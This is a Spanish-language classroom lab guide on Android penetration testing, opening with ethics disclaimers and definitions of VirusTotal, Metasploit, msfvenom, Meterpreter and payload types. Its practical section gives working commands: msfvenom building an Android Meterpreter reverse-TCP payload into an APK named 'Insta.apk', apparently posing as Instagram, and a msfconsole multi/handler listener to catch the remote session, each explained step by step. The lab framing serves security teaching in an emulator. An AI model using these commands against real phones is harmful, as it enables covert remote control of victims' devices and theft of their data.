Pentesting Android

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 8

PROYECTO PENTESTING ANDROID

PENTESTING ANDROID
INFORMACIÓN IMPORTANTE

Uso Responsable y Consideraciones Éticas

Es crucial entender que la información descubierta a través de esto medios debe ser tratada con
responsabilidad y debe ser utilizado únicamente para investigación y propósitos de seguridad
ética.

- Nunca acceda a un dispositivo sin permiso: Descubrir un dispositivo o servicio expuesto no


te da derecho a acceder o manipularlo sin el consentimiento explícito del propietario.
- Informar a los propietarios: Si descubres dispositivos vulnerables, considera informar a los
propietarios o a la autoridad competente de manera responsable, para que puedan tomar
medidas para protegerlos.
- Cuidado con la legalidad: Asegúrate de que tus actividades se adhieren a las leyes locales e
internacionales sobre ciberseguridad y privacidad.

Consideraciones Éticas y Legales:


El uso de Metasploit debe estar estrictamente limitado a pruebas de penetración
autorizadas y entornos controlados donde se tenga el consentimiento explícito del
propietario del sistema. El uso no autorizado de Metasploit es ilegal y puede tener
graves consecuencias legales y éticas.

Página 1 de 8
PENTESTING ANDROID

PENTESTING ANDROID
Instrucciones:
Objetivos
Parte 1: Términos Generales
Parte 2: Instalar Android Studio / Bluestacks
Parte 3: Creación de emulador Android
Parte 4: Preparación de entorno en Kali Linux.
Parte 5: Prueba de aplicación.
Parte 6: Generar reportes.

Recursos necesarios
• 1 PC con MVWare/VirtualBox con máquina virtual de Kali Linux
• Android Studio
• Acceso a internet, de preferencia sin bloqueos a sitios.

Página 2 de 8
PENTESTING ANDROID

Lab 1

Parte 1: Conceptos Generales

Virus Total
Es un servicio en línea gratuito que permite analizar archivos y URLs en busca de virus, malware y otras
amenazas. El análisis se realiza utilizando múltiples motores antivirus y herramientas de detección de
malware de diferentes proveedores de seguridad.
Características Principales de VirusTotal:

1. Escaneo Multimotor:
• VirusTotal utiliza decenas de motores antivirus y herramientas de detección de malware para
analizar archivos y URLs, proporcionando un análisis exhaustivo desde múltiples perspectivas.
2. Subida de Archivos y URLs:
• Los usuarios pueden subir archivos (hasta un cierto límite de tamaño) y enviar URLs para que
sean escaneados en busca de amenazas.
3. Informes Detallados:
• Una vez completado el análisis, VirusTotal proporciona un informe detallado que incluye los
resultados de cada motor antivirus, así como información adicional sobre el archivo o URL, como
su comportamiento y metadatos.
4. Detección de Amenazas en Tiempo Real:
• VirusTotal permite la detección en tiempo real de nuevas amenazas gracias a su amplia base de
datos de malware y la continua actualización de los motores antivirus.
5. API para Integración:
• VirusTotal ofrece una API que permite a desarrolladores integrar sus capacidades de escaneo en
aplicaciones y sistemas personalizados.
6. Inteligencia de Amenazas:
• Además de escanear archivos y URLs, VirusTotal proporciona información sobre la prevalencia y
distribución de malware, así como inteligencia sobre nuevas amenazas emergentes.

https://www.virustotal.com/gui/home/upload

Página 3 de 8
PENTESTING ANDROID

Metasploit
Es un marco de trabajo de código abierto utilizado principalmente para pruebas de penetración y evaluación
de la seguridad de sistemas informáticos. Desarrollado por H. D. Moore y mantenido por Rapid7, Metasploit
proporciona una plataforma robusta para desarrollar, probar y ejecutar exploits contra sistemas vulnerables.
Es una herramienta esencial para profesionales de la seguridad, ya que les permite identificar, validar y
remediar vulnerabilidades de manera eficaz.

Componentes de Metasploit:
1. Msfconsole:
• Es la interfaz principal de Metasploit. Permite a los usuarios interactuar con Metasploit utilizando
comandos.
2. Msfvenom:
• Herramienta para generar y codificar payloads. Combina las funcionalidades de msfpayload y
msfencode.
3. Metasploit Framework:
• El núcleo del proyecto, incluye todos los módulos, exploits, payloads y herramientas auxiliares.
4. Metasploit Pro:
• Versión comercial con características avanzadas como gestión de pruebas de penetración,
explotación automatizada y generación de informes.

MSVENOM
Es una herramienta utilizada en pruebas de penetración y evaluaciones de seguridad para generar payloads
maliciosos que pueden ser utilizados para comprometer sistemas. Forma parte del proyecto Metasploit, una
suite de herramientas de código abierto diseñada para explotar vulnerabilidades de software.
Características y Usos Principales de MSVENOM:
1. Generación de Payloads: MSVENOM permite crear payloads (códigos maliciosos) en diversos formatos
como ejecutables, scripts, archivos de oficina, y más. Estos payloads pueden ser usados para ejecutar
comandos, abrir sesiones remotas, o realizar otras acciones maliciosas en un sistema objetivo.
2. Combinación de Funcionalidades: Integra las funciones de msfencode y msfpayload, herramientas
antiguas del proyecto Metasploit, en una sola utilidad. Esto facilita la creación y la codificación de
payloads en un solo paso.
3. Variedad de Formatos: Soporta una amplia variedad de formatos de salida, como EXE, APK, ASP,
PHP, entre otros, permitiendo a los testers de penetración adaptar el payload al entorno específico del
objetivo.
4. Codificación y Ofuscación: Permite codificar y ofuscar los payloads para evitar la detección por parte
de programas antivirus y otros mecanismos de seguridad.
5. Compatibilidad: Funciona en múltiples sistemas operativos, incluyendo Windows, Linux y macOS, lo
cual permite su uso en una variedad de entornos y plataformas.

Página 4 de 8
PENTESTING ANDROID

Meterpreter
Es un payload avanzado utilizado dentro del framework Metasploit, una herramienta ampliamente usada para
pruebas de penetración y evaluación de seguridad. Desarrollado por H. D. Moore, Meterpreter proporciona un
entorno interactivo y extensible que permite al atacante ejecutar comandos y scripts directamente en el sistema
comprometido. Su diseño modular y en memoria lo hace difícil de detectar y analizar.

Un Payload
Es un término utilizado en el contexto de la seguridad informática y el hacking para referirse a la parte de un
exploit que realiza la acción maliciosa en un sistema objetivo. El payload se introduce a través de una
vulnerabilidad en el sistema y, una vez dentro, ejecuta una tarea específica diseñada por el atacante.

Características y Tipos de Payloads:


1. Acciones Realizadas:
• Ejecutar Comandos: Puede ejecutar comandos en el sistema comprometido.
• Abrir Puertas Traseras: Permite al atacante obtener acceso remoto continuo al sistema.
• Extraer Información: Puede recolectar y enviar información sensible al atacante.
• Desactivar Seguridad: Desactiva o elude medidas de seguridad como antivirus o firewalls.
• Instalar Software Malicioso: Instala otros tipos de malware, como troyanos o spyware.
2. Tipos Comunes de Payloads:
• Shellcode: Código que se inyecta en la memoria del proceso para ejecutar una shell (línea de
comandos) en el sistema objetivo.
• Meterpreter: Un payload avanzado de Metasploit que proporciona un entorno interactivo en la
máquina víctima.
• Reverse Shell: Establece una conexión desde la máquina víctima a la máquina del atacante,
permitiendo control remoto.
• Bind Shell: Abre un puerto en la máquina víctima y espera a que el atacante se conecte a él.
• Downloader: Descarga y ejecuta un archivo malicioso desde una ubicación remota.

Parte 2: Instalar Android Studio / Bluestacks


Realizar la instalación conforme se indica en clase.

Parte 3: Crear Emulador de Android


Realizar la instalación conforme se indica en clase.

Página 5 de 8
PENTESTING ANDROID

Parte 4: Preparación de entorno Kali.

Parte 5: Prueba de Aplicación

Ejecutar Terminal y abrir 3 ventanas

Ventana 1
Verificar nuestra IP

Ventana 2
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=4444 R > Insta.apk

Interpretación del Comando:


• sudo: Ejecuta el comando con privilegios de superusuario. Esto puede ser necesario para acceder a
ciertos directorios o realizar operaciones que requieren permisos elevados.
• msfvenom: Se manda a llamara para generar y codificar el payload.
• -p android/meterpreter/reverse_tcp: Se especifica el tipo de payload que se está generando. En este
caso, se utiliza un payload Meterpreter para Android que establece una conexión inversa (reverse TCP).
• LHOST=xx.xx.xx.x: Define la dirección IP del host atacante, es decir, la máquina que recibirá la
conexión inversa desde el dispositivo Android comprometido. Debes reemplazar xx.xx.xx.x con tu
dirección IP real.
• LPORT=4444: Especifica el puerto en el cual el host atacante escuchará las conexiones entrantes desde
el dispositivo comprometido. En este caso, se usa el puerto 4444, pero se puede cambiar a cualquier
puerto que esté abierto y disponible.
• R: Indica que el payload debe ser enviado al formato raw, que es un formato no codificado directamente
adecuado para generar archivos.
• > Insta.apk: Redirige la salida del comando a un archivo llamado Insta.apk. Este archivo será el APK
generado que contiene el payload malicioso.

Explicación:
1. Ejecutar el Comando con Privilegios: sudo asegura que el comando se ejecuta con los permisos
necesarios, lo cual puede ser requerido dependiendo del entorno y las configuraciones de tu sistema.
2. Generar el Payload: msfvenom crea un payload Meterpreter que establecerá una conexión inversa
desde el dispositivo Android al host atacante.
3. Configurar IP y Puerto: LHOST y LPORT configuran la dirección IP y el puerto donde el dispositivo
comprometido intentará conectarse.
4. Especificar el Formato: La opción R indica que se debe generar el payload en formato raw, que se
redirigirá a un archivo APK.
5. Redirigir la Salida: > redirige la salida generada a un archivo llamado Insta.apk, creando así un archivo
APK que, al ser instalado y ejecutado en un dispositivo Android, intentará conectarse al host atacante.

Página 6 de 8
PENTESTING ANDROID

Ventana 3
Ejecutar Metasploit
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.64.2
set LPORT 4444
exploit

Desglose de Comandos:
1. use exploit/multi/handler:
• Este comando selecciona el módulo de Metasploit llamado multi/handler. Este módulo es un
listener genérico que puede manejar conexiones entrantes desde varios tipos de payloads.
2. set payload android/meterpreter/reverse_tcp:
• Configura el tipo de payload que se va a manejar. En este caso, se está utilizando un payload
meterpreter para Android que establece una conexión inversa (reverse TCP). Esto significa que,
cuando el payload se ejecuta en el dispositivo Android, intentará conectarse de vuelta al host que
está ejecutando el listener.
3. set LHOST 192.168.64.2:
• Configura la dirección IP local del host atacante, es decir, la máquina que está ejecutando
Metasploit y que recibirá la conexión entrante desde el dispositivo Android comprometido. Debes
reemplazar 192.168.64.2 con la dirección IP de tu máquina.
4. set LPORT 4444:

Página 7 de 8
PENTESTING ANDROID

• Configura el puerto en el que el host atacante escuchará las conexiones entrantes. En este caso,
se ha configurado el puerto 4444. Puedes cambiarlo a cualquier puerto que esté abierto y
disponible en tu máquina.
5. exploit:
• Inicia el listener. Metasploit ahora estará esperando conexiones entrantes en la dirección IP y el
puerto especificados. Cuando el dispositivo Android comprometido ejecute el payload generado,
intentará conectarse a este listener, estableciendo una sesión interactiva de Meterpreter.

Generar Reportes.

Página 8 de 8

También podría gustarte